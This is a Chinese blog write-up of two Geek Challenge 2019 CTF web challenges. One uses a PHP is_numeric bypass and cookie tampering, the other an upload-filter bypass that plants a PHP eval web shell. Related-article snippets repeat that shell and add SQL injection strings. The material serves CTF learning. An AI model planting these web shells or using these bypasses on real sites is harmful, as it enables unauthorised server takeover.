极客大挑战 BuyFlag&&Upload

最新推荐文章于 2024-11-25 22:57:33 发布
最新推荐文章于 2024-11-25 22:57:33 发布
阅读量179 收藏
点赞数 2
分类专栏: CTF 文章标签: php web安全 ctf ctf-web 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45924653/article/details/120234475
版权

BuyFlag

PAYFLAG页面,这应该就是重要提示

在这里插入图片描述
源码中发现hint

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->

post传money和password两个参数,password为404时正确但是不能为数字

is_numeric函数的绕过,此题可以使用弱类型或者%20 %00

404a
404%20
404%00

在这里插入图片描述
只能Only Cuit’s students才能购买flag,修改cookie就完事了

在这里插入图片描述
nember长度太长了使用科学技术法,得到flag

在这里插入图片描述

Upload

上传phtml文件,准备个一句话

GIF89a
<script language="php">eval($_POST['c7ay']);</script>

在这里插入图片描述

将类型修改为image/jpeg

在这里插入图片描述
在这里插入图片描述
蚁剑连shell

在这里插入图片描述
flag在根目录下

在这里插入图片描述

人生漫漫其修远兮,网安无止境。
一同前行,加油!

BUUCTF__[极客挑战 2019]BuyFlag_题解
风过江南乱的博客
07-05 1077
BUUCTF__[极客挑战 2019]BuyFlag_题解 PHP弱类型和低版本PHP的`strcmp()`函数漏洞
buuctf入门学习
TheGa31的博客
02-04 451
设置两个私有变量 ,利用 __construct 构造函数 来进行一个一一对应的关系之后__wakeup() 让 username 变量等于 guest在类结束的时候,调用__desctruct()函数 ,如果这个 password不等于100 ,就会输出 username…上传成功,看一下源代码没有什么比较重要的信息,bp抓包看一下,改一下php后缀试一下能不能传上去。直接给了flag,提交试一下 这是一个假的flag,那就看一下index.php源码。看到了flag.php直接打开看一下。
2020UNCTF writteup 部分题解(MISC,CRPTO)
fightte的博客
11-23 504
2020UNCTF writteup 部分题解(MISC,CRPTO) 开头: 之前打完了2020年的UNCTF,当然7天学了很多,打了很久,现在分享几道题,记录一下: REVERSE:(逆向) 1. 将下载的exe文件放入ida进行反编译: 查看框体图,明显看到下面分支有一个判断。通过伪代码也可以看出: 进入str2可以看出str2里有疑似flag的数据,按r键改成字符串: 就是flag! CRYPTO: hint提示到:法官很缺营养:在查询CTF常用密码时,看到了培根密码,暗示此题
0CTF2017 WEB WriteUp
Bendawang's Blog
03-20 9873
0CTF2017 WEB WriteUp
BUUCTF-极客挑战2019
Atkx's Blog
01-27 764
[极客挑战2019]Http [极客挑战2019]upload 将里面的内容改为一句话木马 GIF89a <script language="php">eval($_POST['shell']);</script> /upload/test.phtml [极客挑战2019]PHP 访问靶机地址 提到了备份网站,直接访问www.zip文件,flag.php里面有个假的flag 查看一下index.php,发现要用get方式提交参数select 再查看class.php
极客挑战2019(复习一下漏洞)
qq_62046696的博客
07-17 1306
这种一般都是备份文件了,其实不太喜欢备份文件,扫目录太慢了,打开dirsearch进行扫目录了,其实是先尝试了一下index.php.bak发现没有,扫出来了www.zip。这道题难就难在,不按套路出牌,Flaaaag里面的f14gawsl字段,里面的值时NO,真正的flag在F1nal1y表里面的password字段。2、再尝试闭合方式,账号输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合(提示记得密码填上东西)...
Buuctf极客挑战练习
qq_45927819的博客
08-03 508
文章目录[极客挑战 2019]Knife 1[极客挑战 2019]Http 1[极客挑战 2019]Upload 1[极客挑战 2019]PHP 1 [极客挑战 2019]Knife 1 白给的shell 一句话木马 直接蚁剑或者菜刀连接 在根目录下得到flag [极客挑战 2019]Http 1 打开环境查看源码发现Secret.php: 访问一下: 也就是这个网页不是来自https://www.Sycsecret.com的 抓包,添加referer头,referer头就是证明你从哪
BUU-2019极客挑战全集
unexpectedthing的博客
09-24 292
文章目录HavefunEasySQLSecret-FileKnifeHTTPUploadPHPBuyflagloveSqlbabysql Havefun 首先F12,查看源代码 直接出flag EasySQL 进来,一看就是sql注入题 使用万能密码:username=admin’ or 1=1 # password=1 Secret-File F12 点击SELECT抓包,放包 得到代码 strstr函数和stristr() strstr(PHP 4, PHP 5, PHP 7, PHP 8)
[极客挑战 2019]web部分题解(已完结!)
m0_64670504的博客
03-19 1345
个人写的wp,欢迎斧正,热忱之心不可变哦
极客挑战(部分)
BvxiE的博客
04-09 2642
这里写自定义目录标题[极客挑战 2019]EasySQL永真表达式使用万能账号 [极客挑战 2019]EasySQL 由题目可得做题方向 永真表达式 admin' or '1'='1 注意:只需要密码维持此式即可解出 使用万能账号 a' or true # 密码随便输入即可 从这里找到的表 ..............................
Buuctf Web题解
weixin_68029979的博客
04-24 1997
写在前面, 本人小白一枚,记录一下web做题过程,部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
BUUCTF web(二)
m0_46616663的博客
10-21 1477
[极客挑战 2019]Upload upload想到了文件上传漏洞,先传个一句话木马试试,php和图片马都不行 试一下phtml,phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 也不行,抓包改一下Content-Type 不让用<?,那就换一种 。。。。 再加个文件头 GIF89a OK了,猜测路径应该在/upload里面 蚁剑连上找到根目录下的flag [RoarCTF 2019]Easy Calc 源码发现 <?php error_reportin
BUUCTF-WEB
ccfly1012的博客
11-02 4076
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2280
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flagflag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flagflag{fac64f95-3877-4f3e-9772-47bb8585b31a}
[极客挑战 2019]Secret File 1
她叫常玉莹
03-15 4493
开局一个页面开干,粗略看了下源码开始没发现啥(意了,主要盯注释了),试了robots.txt没有东西,目录用dirsearch扫了一遍也没有什么发现,擦 后来发现源码里发现了,这不就来了嘛 点进去一看发现了action.php 一点直接就变成了end.php这不是有重定向嘛 有问题,遇事不决先抓包 果然action.php直接跳转end.php,响应包中发现secr3t.php访问一下,是一段php代码 文件包含没有过滤fillter直接伪协议拿下 secr3t.php?file=php://.
[HCTF 2018]admin
她叫常玉莹
04-21 2529
来到题目的主页面,看到主页右面有一个下拉框,有登陆,注册功能,注册个用户再说,登陆后有编辑、更改密码、登出功能。 源码中hint提示不是admin,题目肯定是想让我们登陆admin用户,在更改密码页面源码中有一个github地址,去看一下github 是一个flask项目下载下来审计一下,先看下路由routes.py index函数 @app.route('/') @app.route('/index') def index(): return render_template('index.ht
[RoarCTF 2019]Easy Calc
她叫常玉莹
09-16 992
查看源码发现calc.php文件 calc.php文件 本题考查PHP字符串解析漏洞 PHP将查询字符串(在URL或正文中)转换为内部GET或的关联数组_GET或的关联数组G​ET或的关联数组_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42) PHP将所有参数转换为有效的变量名 删除空白字符 将某
2021CTF红明谷杯数据安全赛 write_shell
她叫常玉莹
07-30 851
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input;
[BUUCTF 2018]Online Tool
她叫常玉莹
06-30 804
[BUUCTF 2018]Online Tool wp
极客挑战 2019]BuyFlag 1
最新发布
02-22
### 极客挑战 2019 BuyFlag 解决方案 #### 修改 Cookie 值 为了满足购旗帜的第一个条件,即成为来自CUIT的学生,在浏览器中通过开发者工具(通常按 F12 打开)找到并修改 `cookie` 的值。具体来说,将 `user=0`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值